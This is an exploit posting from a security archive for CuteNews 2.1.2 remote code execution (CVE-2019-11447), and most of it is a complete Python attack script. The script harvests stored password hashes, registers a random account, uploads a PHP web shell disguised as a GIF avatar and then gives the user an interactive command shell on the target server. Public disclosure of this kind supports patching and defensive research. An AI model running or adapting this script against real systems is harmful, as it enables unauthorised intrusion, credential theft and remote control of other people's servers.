Lucene search

K
packetstormMusyoka IanPACKETSTORM:159134
HistorySep 10, 2020 - 12:00 a.m.

CuteNews 2.1.2 Remote Code Execution

2020-09-1000:00:00
Musyoka Ian
packetstormsecurity.com
561
`# Exploit Title: CuteNews 2.1.2 - Remote Code Execution  
# Google Dork: N/A  
# Date: 2020-09-10  
# Exploit Author: Musyoka Ian  
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php  
# Software Link: https://cutephp.com/cutenews/downloading.php  
# Version: CuteNews 2.1.2  
# Tested on: Ubuntu 20.04, CuteNews 2.1.2  
# CVE : CVE-2019-11447  
  
#! /bin/env python3  
  
import requests  
from base64 import b64decode  
import io  
import re  
import string  
import random  
import sys  
  
  
banner = """  
  
  
_____ __ _ __ ___ ___ ___   
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |  
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/   
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/   
___ _________   
/ _ \/ ___/ __/   
/ , _/ /__/ _/   
/_/|_|\___/___/   
  
  
  
"""  
print (banner)  
print ("[->] Usage python3 expoit.py")  
print ()  
sess = requests.session()  
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"  
ip = input("Enter the URL> ")  
def extract_credentials():  
global sess, ip  
url = f"{ip}/CuteNews/cdata/users/lines"  
encoded_creds = sess.get(url).text  
buff = io.StringIO(encoded_creds)  
chash = buff.readlines()  
if "Not Found" in encoded_creds:  
print ("[-] No hashes were found skipping!!!")  
return  
else:  
for line in chash:  
if "<?php die('Direct call - access denied'); ?>" not in line:  
credentials = b64decode(line)  
try:  
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)  
print (sha_hash)  
except:  
pass  
def register():  
global sess, ip  
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))  
postdata = {  
"action" : "register",  
"regusername" : userpass,  
"regnickname" : userpass,  
"regpassword" : userpass,  
"confirm" : userpass,  
"regemail" : f"{userpass}@hack.me"  
}  
register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)  
if 302 == register.status_code:  
print (f"[+] Registration successful with username: {userpass} and password: {userpass}")  
else:  
sys.exit()  
def send_payload(payload):  
global ip  
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text  
signature_key = re.search('signature_key" value="(.*?)"', token).group(1)  
signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)  
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)  
print (f"signature_key: {signature_key}")  
print (f"signature_dsi: {signature_dsi}")  
print (f"logged in user: {logged_user}")  
  
files = {  
"mod" : (None, "main"),  
"opt" : (None, "personal"),  
"__signature_key" : (None, f"{signature_key}"),  
"__signature_dsi" : (None, f"{signature_dsi}"),  
"editpassword" : (None, ""),  
"confirmpassword" : (None, ""),  
"editnickname" : (None, logged_user),  
"avatar_file" : (f"{logged_user}.php", payload),  
"more[site]" : (None, ""),  
"more[about]" : (None, "")  
}  
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text  
print("============================\nDropping to a SHELL\n============================")  
while True:  
print ()  
command = input("command > ")  
postdata = {"cmd" : command}  
output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)  
if 404 == output.status_code:  
print ("sorry i can't find your webshell try running the exploit again")  
sys.exit()  
else:  
output = re.sub("GIF8;", "", output.text)  
print (output.strip())  
  
if __name__ == "__main__":  
print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")  
extract_credentials()  
print ("================================================================")  
print()  
print ("=============================\nRegistering a users\n=============================")  
register()  
print()  
print("=======================================================\nSending Payload\n=======================================================")  
send_payload(payload)  
print ()  
`
Related for PACKETSTORM:159134